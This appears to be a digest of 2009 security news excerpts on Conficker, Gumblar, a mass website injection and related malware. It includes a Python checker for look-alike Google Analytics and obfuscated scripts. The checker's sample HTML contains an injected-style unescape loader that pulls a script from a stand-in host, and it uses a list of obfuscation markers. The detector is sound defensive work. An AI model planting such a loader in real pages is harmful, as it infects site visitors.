Examining Conficker: When a worm becomes a botnet

From TechTarget (Brian Sears)

I recently read an article where two experts expressed different ideas of what Conficker represented. One expert argued that Conficker was clearly not a botnet, as it lacked some of the basic abilities typically found in botnets, while the other expert said Conficker indeed was a botnet. In the end they both agreed Conficker represented a significant threat. So what is Conficker? Well, in the case of our two experts, they were both right and wrong. In my opinion, Conficker appears as a package or a mesh of several different threats, each one with its own purpose. Read the full story []

The Twitter worm that isn’t

By Roel Schouwenberg

On Saturday an alert went out about a new Twitter worm.

Could this have been another XSS-Worm? Upon clicking the link users would see the following:
However that’s not all that happens. Covertly a connection is made to another server that will result in a malicious PDF being downloaded. This PDF contains a flurry of exploits.

30,000 legit websites hit by malware infection

From The Register (Dan Goodin)

A nasty infection that attempts to install a potent malware cocktail on the machines of end users has spread to about 30,000 websites run by businesses, government agencies and other organizations, researchers warned Friday [].

The infection sneaks malicious javascript onto the front page of websites, most likely by exploiting a common application that leads to a SQL injection, said Stephan Chenette, manager for security research at security firm Websense. The injected code is designed to look like a Google Analytics script, and it uses obfuscated javascript, so it is hard to spot. Read the full story []
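The injection technique described above (a script that imitates Google Analytics but loads from elsewhere, or an obfuscated inline script) can be checked for on a site's own front page. The following is an added example written for this digest, not code from Websense or The Register; the allow-list of Google Analytics hosts, the obfuscation markers and the sample HTML are all constructed assumptions for illustration.

```python
import re
from html.parser import HTMLParser

# Hosts from which the genuine Google Analytics loader was served at the time
# (assumption for this example; adjust to your own allow-list).
GA_HOSTS = {"www.google-analytics.com", "ssl.google-analytics.com", "google-analytics.com"}

# Substrings that are typical of obfuscated injected scripts (assumption).
OBFUSCATION_MARKERS = ("unescape(", "String.fromCharCode(", "eval(")

# Identifiers used by the legitimate GA snippet of that era; their presence in
# an inline script marks it as "claiming" to be Google Analytics.
GA_IDENTIFIERS = ("_gat", "urchinTracker", "pageTracker")


class ScriptCollector(HTMLParser):
    """Collect every <script> element as {"src": str|None, "body": str}."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def host_of(url):
    """Return the lower-cased host of an http(s) or protocol-relative URL."""
    m = re.match(r"^(?:https?:)?//([^/:?#]+)", url.strip(), re.I)
    return m.group(1).lower() if m else None


def find_suspicious_scripts(html):
    """Flag GA look-alike external scripts and obfuscated inline scripts."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for s in parser.scripts:
        src, body = s["src"], s["body"]
        if src:
            # External script: if it presents itself as Google Analytics but is
            # not served from a known GA host, treat it as a look-alike.
            if "google-analytics" in src.lower() and host_of(src) not in GA_HOSTS:
                findings.append(("ga-lookalike-src", src))
        elif any(marker in body for marker in OBFUSCATION_MARKERS):
            # Inline script using unescape/fromCharCode/eval: likely obfuscated.
            findings.append(("obfuscated-inline", body.strip()[:60]))
    return findings


# Constructed sample page: a genuine GA snippet plus two injected scripts.
SAMPLE_HTML = """
<html><body>
<script src="http://www.google-analytics.com/ga.js"></script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-000000-1"); pageTracker._trackPageview();
</script>
<p>site content</p>
<script src="http://www.google-analytics.example.invalid/ga.js"></script>
<script>document.write(unescape("%3Cscript src='http://example.invalid/x.js'%3E%3C/script%3E"));</script>
</body></html>
"""

# Constructed clean page with only the legitimate snippet.
CLEAN_HTML = """
<html><body>
<script src="http://www.google-analytics.com/ga.js"></script>
<script>var pageTracker = _gat._getTracker("UA-000000-1"); pageTracker._trackPageview();</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in find_suspicious_scripts(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

The check is deliberately narrow: it only asks whether a script that claims to be Google Analytics really comes from a Google Analytics host, and whether an inline script uses the string-decoding calls that obfuscated injections lean on. Run it against a crawl of your own pages and diff the output over time; a new finding on a page nobody edited is the signal the article describes.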

From CNet (Elinor Mills)

The Web site compromise attack known as Gumblar has added new domain names that are downloading malware onto unsuspecting computers, stealing FTP credentials to compromise more sites, and tampering with Web traffic, a security firm said on Thursday.

The Gumblar attack started in March with Web sites being compromised and attack code hidden on them. Originally, the malware downloaded onto computers accessing those sites came from the domain, a Chinese domain associated with Russian and Latvian IP addresses that were delivering code from servers in the U.K. Read the full story []

There is a series of vulnerabilities in the widely used BlackBerry Enterprise Server software that could allow an attacker to compromise BlackBerry devices by sending a malicious PDF file. Research in Motion, the software’s maker, has issued a patch that fixes the problem in BES, as well as in BlackBerry Professional Software.

The latest large-scale malware outbreak to hit the Web, known variously as Gumblar and Geno and Martuz, is a multi-stage attack that not only infects compromised machines with a number of separate pieces of malware but also has the ability to steal credentials and block the victim from taking actions to clean his PC.

From the Associated Press

Law enforcement computers were struck by a mystery computer virus Thursday, forcing the FBI and the U.S. Marshals to shut down part of their networks as a precaution.

The U.S. Marshals confirmed it disconnected from the Justice Department’s computers as a protective measure after being hit by the virus; an FBI official said only that the agency was experiencing similar issues and was working on the problem. Read the full story []

From CNet News (Liam Tung)

Cybercrime fighter Eugene Kaspersky can’t help but be impressed by the slick operations behind the Conficker botnet, and says that it could have been worse had the botnet been after more than just money. “They are high-end engineers who write code in a good way,” Kaspersky said. “They use cryptographic systems in the right way, they don’t make mistakes — they are really professional.”

From IDG News Service (Robert McMillan)

A new attack that peppers Google search results with malicious links is spreading quickly, the U.S. Computer Emergency Response Team warned [] on Monday.

The attack, which has intensified in recent days, can be found on several thousand legitimate Web sites, according to security experts. It targets known flaws in Adobe’s software and uses them to install a malicious program on victims’ machines, CERT said. Read the full story []
